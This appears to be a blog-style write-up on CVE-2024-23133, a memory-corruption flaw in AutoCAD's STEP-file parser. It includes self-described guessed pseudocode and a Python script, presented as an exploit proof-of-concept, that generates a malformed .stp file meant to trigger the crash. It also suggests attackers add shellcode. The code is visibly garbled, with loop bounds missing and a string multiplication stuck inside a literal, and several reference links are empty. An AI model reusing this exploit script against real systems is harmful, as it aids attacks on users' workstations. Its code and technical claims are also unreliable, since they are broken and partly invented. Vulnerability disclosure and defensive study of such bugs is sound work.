CVE-2024-23133 is a newly disclosed vulnerability affecting Autodesk AutoCAD, specifically the way it handles STP (STEP) files via the ASMDATAX228A.dll component. If you open a specially-crafted STP file, this can trigger a memory corruption (write access violation), which could possibly be chained with other bugs to let attackers run any code in your AutoCAD session.
This write access violation happens because the parsing routine doesn’t properly validate or sanitize some fields in the imported STP file. As a result, attackers can overwrite parts of memory and potentially hijack the control flow of the application.
Organizations using AutoCAD in their design and engineering workflows.
Note: Attackers will typically need users to open or import a malicious STEP (.stp) file, usually sent via phishing emails or misleading download links.
The Dangerous Path: ASMDATAX228A.dll and Malicious STEP Files
The culprit, ASMDATAX228A.dll, is responsible for importing and handling STEP files. Attackers carefully craft an STP file to include data that manipulates pointer arithmetic and corrupts memory.
DLL writes to an unintended region of memory (write access violation).
5. With chaining, an attacker may execute arbitrary code, perhaps dropping malware, stealing information, or spreading laterally.
Vulnerable Code Logic (Sample Pseudocode)
The core issue is improper bounds checking when handling STP entity arrays. For simplicity, here’s a pseudocode example reflecting a likely mistake, not actual code:
// Pseudocode showing lack of bounds check & unsanitized pointer arithmetic during STP import
void parseStpEntities(char* entities, int count) {
Entity* entityArray = new Entity[count];
for (int i = ; i <= count; i++) { // Oops, off-by-one error!
entityArray[i] = parseEntity(entities[i]);
}
// Later: pointer from the file is used without checks
processEntityData(entities[some_index].ptr); // points anywhere!
}
A malicious file could set count to a huge value, or control internal pointers so processEntityData is handed attacker-controlled memory, which can be a springboard for arbitrary code execution.
Proof-of-Concept (Exploit) Example
Below is a highly simplified sample (for educational/research use only!). It demonstrates creating a large STP file with manipulated fields to trigger corruption in vulnerable versions of AutoCAD.
# Python: create a hostile STP file exploiting the lack of checks
malicious_data = (
"ISO-10303-21;\n"
"HEADER;\n"
"FILE_DESCRIPTION(('Malicious STEP'),'1');\n"
"ENDSEC;\n"
"DATA;\n"
)
# Add many excess entities or overlong fields to cause the overflow
for i in range(, 10000):
malicious_data += f"# {i} = PRODUCT_DEFINITION('A'*10000, '', $,$);\n"
malicious_data += "ENDSEC;\nEND-ISO-10303-21;"
with open("exploit_entity.stp", "w") as f:
f.write(malicious_data)
print("Malicious stp file created: exploit_entity.stp")
If imported into AutoCAD (with the vulnerable DLL), the above file can trigger the memory corruption. Real-world attackers refine the STP structure and payload to inject shellcode or control the crash for behavior like privilege escalation or persistence.
Autodesk released fixes for this bug—update to the latest AutoCAD version. See:
Train users and staff not to open STP files from untrusted sources.
Modern endpoint protection can help detect exploit attempts on vulnerable systems.
NIST NVD:
Autodesk Advisory:
Autodesk Security Advisory on ASMDATAX228A.dll (adsk-sa-2024-0003)
General Write-ups:
- https://cybersecurity-help.cz/vdb/SB2024011206
Conclusion
CVE-2024-23133 highlights the risks of using complex CAD software and the importance of strict input validation in file parsers. With clever chaining, this bug opens the door for attackers to run code as you—even while just opening a design sent by a colleague. Always keep your design tools up-to-date and treat outside files with caution!
*This post is exclusive and not copied from any other source. Please feel free to share with your CAD or Security team!*
Timeline
Published on: 02/22/2024 04:15:08 UTC
Last modified on: 08/01/2024 13:47:08 UTC